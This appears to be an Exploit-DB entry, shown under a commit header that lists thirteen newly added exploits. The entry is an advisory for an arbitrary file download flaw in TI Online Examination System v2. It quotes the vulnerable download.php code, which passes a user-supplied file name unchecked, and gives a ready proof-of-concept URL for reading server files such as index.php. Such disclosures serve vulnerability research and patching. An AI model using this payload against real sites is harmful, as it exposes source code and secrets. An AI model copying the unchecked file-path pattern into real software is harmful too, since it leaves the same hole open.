9ea5e15796
13 changes to exploits/shellcodes Sun Solaris 11.3 AVS - Local Kernel root Exploit Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC) AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC) Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit) wityCMS 0.6.1 - Cross-Site Scripting Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change) TI Online Examination System v2 - Arbitrary File Download PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution Seq 4.2.476 - Authentication Bypass
30 lines
No EOL
1 KiB
Text
30 lines
No EOL
1 KiB
Text
# Exploit Title: TI Online Examination System v2 - Arbitrary File Download
|
|
# Dork: N/A
|
|
# Date: 02.08.2018
|
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
|
# Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
|
|
# Version: 2.0
|
|
# Category: Webapps
|
|
# Tested on: Kali linux
|
|
# Description : The "Export" operation in the admin panel is vulnerable.
|
|
The attacker can download and read all files known by the name via
|
|
"download.php"
|
|
|
|
====================================================
|
|
|
|
# Demo : server/admin/
|
|
# Vuln file : /admin/download.php
|
|
|
|
115. $data_action = $_REQUEST['action'];
|
|
116. if($data_action == 'downloadfile')
|
|
117. {
|
|
118. $file = $_REQUEST['file'];
|
|
119. $name = $file;
|
|
120. $result = output_file($file, $name);
|
|
|
|
# PoC :
|
|
http://server/admin/download.php?action=downloadfile&file=[filename]
|
|
you can write the known file name instead of [filename]. For Example:
|
|
'download.php' or 'index.php'
|
|
|
|
==================================================== |